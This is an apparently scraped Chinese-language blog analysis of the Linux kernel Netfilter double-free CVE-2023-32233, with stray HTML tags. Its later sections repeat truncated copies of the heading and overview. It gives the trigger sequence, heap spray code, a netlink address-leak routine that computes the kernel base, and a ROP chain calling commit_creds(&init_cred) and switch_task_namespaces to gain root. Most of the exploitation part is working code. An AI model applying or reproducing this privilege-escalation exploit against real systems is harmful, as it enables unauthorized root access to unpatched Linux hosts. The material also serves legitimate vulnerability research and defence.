CVE-2023-32233漏洞利用方案深度分析<\/h1>

漏洞概述<\/h2>
CVE-2023-32233是Linux内核Netfilter子系统中的一个双重释放(Double Free)漏洞，存在于NFT_MSG_DELSET消息处理过程中。该漏洞允许攻击者在特定条件下实现内核内存的任意释放，进而可能导致权限提升。<\/p>

漏洞原理分析<\/h2>

关键代码分析<\/h3>

漏洞主要存在于nft_set_destroy<\/code>函数中：<\/p>

static<\/span> void<\/span> nft_set_destroy<\/span>(const<\/span> struct<\/span> nft_ctx *<\/span>ctx, struct<\/span> nft_set *<\/span>set)
<\/span><\/span>{
<\/span><\/span>    int<\/span> i;
<\/span><\/span>    if<\/span> (WARN_ON(set-><\/span>use ><\/span> 0<\/span>))
<\/span><\/span>        return<\/span>;
<\/span><\/span>    
<\/span><\/span>    for<\/span> (i =<\/span> 0<\/span>; i <<\/span> set-><\/span>num_exprs; i++<\/span>)
<\/span><\/span>        nft_expr_destroy(ctx, set-><\/span>exprs[i]);
<\/span><\/span>    
<\/span><\/span>    set-><\/span>ops-><\/span>destroy(set);
<\/span><\/span>    nft_set_catchall_destroy(ctx, set);
<\/span><\/span>    kfree(set-><\/span>name); \/\/ set->name double free
<\/span><\/span><\/span><\/span>    kvfree(set);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>以及nft_commit_release<\/code>函数中：<\/p>
static<\/span> void<\/span> nft_commit_release<\/span>(struct<\/span> nft_trans *<\/span>trans)
<\/span><\/span>{
<\/span><\/span>    switch<\/span> (trans-><\/span>msg_type) {
<\/span><\/span>    case<\/span> NFT_MSG_DELSET:
<\/span><\/span>        nft_set_destroy(&<\/span>trans-><\/span>ctx, nft_trans_set(trans));
<\/span><\/span>        break<\/span>;
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞触发条件<\/h3>

创建一个匿名set（pwn_lookup_set）<\/li>
创建一个包含lookup expr的rule，该expr引用pwn_lookup_set<\/li>
下发包含两个请求的netlink批处理：

NFT_MSG_DELRULE<\/li>
NFT_MSG_DELSET<\/li>
<\/ul>
<\/li>
<\/ol>
处理流程：<\/p>

nft_commit_release<\/code>处理NFT_MSG_DELRULE会删除rule和lookup expr，同时释放pwn_lookup_set<\/li>
nft_commit_release<\/code>处理NFT_MSG_DELSET时会再次尝试释放已经被释放的pwn_lookup_set<\/li>
<\/ol>
漏洞利用方案<\/h2>
利用步骤详解<\/h3>


初始设置<\/strong>：<\/p>

创建匿名set (pwn_lookup_set)<\/li>
创建包含lookup expr的rule，该expr引用pwn_lookup_set<\/li>
<\/ul>
<\/li>

触发双重释放<\/strong>：<\/p>

构造包含NFT_MSG_DELRULE和NFT_MSG_DELSET的netlink批处理请求<\/li>
在两次释放之间使用另一个set (race_set)占位<\/li>
<\/ul>
<\/li>

内存布局控制<\/strong>：<\/p>

通过控制race_set的name长度获取dyn-kmalloc-256的UAF<\/li>
堆喷race_set控制name：<\/li>
<\/ul>
for<\/span> (int<\/span> spray =<\/span> 0<\/span>; spray !=<\/span> 0x20<\/span>; ++<\/span>spray) {
<\/span><\/span>    char<\/span> *<\/span>set_name;
<\/span><\/span>    asprintf(&<\/span>set_name, "race_set_%0200hx"<\/span>, spray); \/\/ 分配209大小的set_name
<\/span><\/span><\/span><\/span>    pwn_create_set(batch, seq++<\/span>, set_name, spray, NFT_SET_ANONYMOUS, 
<\/span><\/span>                  sizeof<\/span>(uaf_set_key), set_desc_size, 0<\/span>, 0<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

获取内存读写能力<\/strong>：<\/p>

使用chain->udata占位set->name<\/li>
释放set实现chain->udata的UAF<\/li>
分配udata的代码：<\/li>
<\/ul>
if<\/span> (nla[NFTA_CHAIN_USERDATA]) {
<\/span><\/span>    chain-><\/span>udata =<\/span> nla_memdup(nla[NFTA_CHAIN_USERDATA], GFP_KERNEL_ACCOUNT);
<\/span><\/span>    if<\/span> (chain-><\/span>udata ==<\/span> NULL) {
<\/span><\/span>        err =<\/span> -<\/span>ENOMEM;
<\/span><\/span>        goto<\/span> err_destroy_chain;
<\/span><\/span>    }
<\/span><\/span>    chain-><\/span>udlen =<\/span> nla_len(nla[NFTA_CHAIN_USERDATA]);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

堆喷chain->udata<\/strong>：<\/p>
for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> 0x20<\/span>; i++<\/span>) {
<\/span><\/span>    char<\/span> *<\/span>chain_name;
<\/span><\/span>    asprintf(&<\/span>chain_name, "spray_chain_%08hx"<\/span>, i);
<\/span><\/span>    pwn_create_leak_chain(batch, seq++<\/span>, chain_name);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
地址泄露技术<\/h3>


通过NFT_MSG_GETCHAIN读取chain->udata的数据<\/p>
<\/li>

使用nft_rule结构体占位udata泄露地址：<\/p>

rule结构中的list指针指向堆喷的相邻rule，可泄露堆地址<\/li>
expr中的ops指针保存了KO的地址，可计算gadget地址<\/li>
结构体大小用户态可控<\/li>
<\/ul>
<\/li>

泄露代码：<\/p>
<\/li>
<\/ol>
struct<\/span> nlmsghdr *<\/span>nlh =<\/span> nftnl_nlmsg_build_hdr(mnl_batch_buffer, NFT_MSG_GETCHAIN, 
<\/span><\/span>                                            NFPROTO_INET, NLM_F_ACK, seq);
<\/span><\/span>char<\/span> *<\/span>chain_name;
<\/span><\/span>asprintf(&<\/span>chain_name, "spray_chain_%08hx"<\/span>, i);
<\/span><\/span>nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name);
<\/span><\/span>nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, "testfirewall"<\/span>);
<\/span><\/span>nftnl_chain_nlmsg_build_payload(nlh, chain);
<\/span><\/span>nftnl_chain_free(chain);
<\/span><\/span>
<\/span><\/span>if<\/span> (mnl_socket_sendto(nl, nlh, nlh-><\/span>nlmsg_len) <<\/span> 0<\/span>) {
<\/span><\/span>    err(1<\/span>, "Cannot into mnl_socket_sendto()"<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>memset(mnl_batch_buffer, 0<\/span>, sizeof<\/span>(mnl_batch_buffer));
<\/span><\/span>mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit);
<\/span><\/span>
<\/span><\/span>nft_counter_ops =<\/span> *<\/span>(unsigned<\/span> long<\/span> *<\/span>)&<\/span>mnl_batch_buffer[0x74<\/span>];
<\/span><\/span>kbase =<\/span> nft_counter_ops -<\/span> NFT_COUNTER_OPS;
<\/span><\/span>heap_addr =<\/span> *<\/span>(unsigned<\/span> long<\/span> *<\/span>)&<\/span>mnl_batch_buffer[0x64<\/span>];
<\/span><\/span>victim_rule_handle =<\/span> *<\/span>(unsigned<\/span> long<\/span> *<\/span>)&<\/span>mnl_batch_buffer[0x6c<\/span>] &<\/span> 0xffff<\/span>;
<\/span><\/span><\/code><\/pre>ROP链构造与执行<\/h3>

利用chain->udata伪造rule结构和nft_counter expr<\/li>
通过NFT_MSG_DELRULE触发expr->ops->deactivate调用进入ROP<\/li>
<\/ol>
ROP链构造示例：<\/p>
void<\/span> make_payload_rop<\/span>(uint64_t<\/span> *<\/span>data) {
<\/span><\/span>    int<\/span> i =<\/span> 0<\/span>;
<\/span><\/span>    data[i++<\/span>] =<\/span> kbase +<\/span> POP_RSI_RET; \/\/ dummy
<\/span><\/span><\/span><\/span>    data[i++<\/span>] =<\/span> 0<\/span>;
<\/span><\/span>    data[i++<\/span>] =<\/span> kbase +<\/span> POP_RSI_RET; \/\/ dummy
<\/span><\/span><\/span><\/span>    data[i++<\/span>] =<\/span> 0<\/span>;
<\/span><\/span>    data[i++<\/span>] =<\/span> kbase +<\/span> POP_RSI_RET; \/\/ dummy
<\/span><\/span><\/span><\/span>    data[i++<\/span>] =<\/span> kbase +<\/span> PUSH_RAX_POP_RSP; \/\/ expr->ops->deactivate()
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    \/\/ find_task_by_vpid(1)
<\/span><\/span><\/span><\/span>    data[i++<\/span>] =<\/span> kbase +<\/span> POP_RDI_RET;
<\/span><\/span>    data[i++<\/span>] =<\/span> 1<\/span>;
<\/span><\/span>    data[i++<\/span>] =<\/span> kbase +<\/span> FIND_TASK_BY_VPID;
<\/span><\/span>    
<\/span><\/span>    \/\/ switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
<\/span><\/span><\/span><\/span>    data[i++<\/span>] =<\/span> kbase +<\/span> MOV_RDI_RAX_RET;
<\/span><\/span>    data[i++<\/span>] =<\/span> kbase +<\/span> POP_RSI_RET;
<\/span><\/span>    data[i++<\/span>] =<\/span> kbase +<\/span> INIT_NSPROXY;
<\/span><\/span>    data[i++<\/span>] =<\/span> kbase +<\/span> SWITCH_TASK_NAMESPACES;
<\/span><\/span>    
<\/span><\/span>    \/\/ commit_creds(&init_cred)
<\/span><\/span><\/span><\/span>    data[i++<\/span>] =<\/span> kbase +<\/span> POP_RDI_RET;
<\/span><\/span>    data[i++<\/span>] =<\/span> kbase +<\/span> INIT_CRED;
<\/span><\/span>    data[i++<\/span>] =<\/span> kbase +<\/span> COMMIT_CREDS;
<\/span><\/span>    
<\/span><\/span>    data[i++<\/span>] =<\/span> kbase +<\/span> VFORK;
<\/span><\/span>    data[i++<\/span>] =<\/span> kbase +<\/span> DELAY;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>技术要点总结<\/h2>


理想泄露对象特征<\/strong>：<\/p>

同时包含链表指针和内核镜像\/KO地址的结构体（如struct rule）<\/li>
可以同时泄露出堆地址和代码段地址<\/li>
堆地址可通过内核逻辑进行占位控制数据<\/li>
<\/ul>
<\/li>

Netlink对象利用优势<\/strong>：<\/p>

对于桌面端内核漏洞（Ubuntu有ns权限）利用非常方便<\/li>
提供了丰富的内存操作原语<\/li>
<\/ul>
<\/li>

关键利用技巧<\/strong>：<\/p>

通过批处理消息制造竞争条件<\/li>
精心控制内存布局实现UAF<\/li>
利用内核对象特性实现地址泄露<\/li>
通过伪造对象触发ROP执行<\/li>
<\/ul>
<\/li>
<\/ol>
参考资源<\/h2>

Google Security Research - CVE-2023-32233 Exploit<\/a><\/li>
前文分析<\/a><\/li>
<\/ol>

CVE-2023-32233漏洞利用方案深度分析<\/h1>

漏洞概述<\/h2> CVE-2023-32233是Linux内核Netfilter子系统中的一个双重释放(Double Free)漏洞，存在于NFT_MSG_DELSET消息处理过程中。该漏洞允许攻击者在特定条件下实现内核内存的任意释放，进而可能导致权限提升。<\/p>

漏洞原理分析<\/h2>

漏洞利用方案<\/h2>

参考资源<\/h2> Google Security Research - CVE-2023-32233 Exploit<\/a><\/li> 前文分析<\/a><\/li> <\/ol>

漏洞概述<\/h2>
CVE-2023-32233是Linux内核Netfilter子系统中的一个双重释放(Double Free)漏洞，存在于NFT_MSG_DELSET消息处理过程中。该漏洞允许攻击者在特定条件下实现内核内存的任意释放，进而可能导致权限提升。<\/p>

参考资源<\/h2>

Google Security Research - CVE-2023-32233 Exploit<\/a><\/li>
前文分析<\/a><\/li> <\/ol>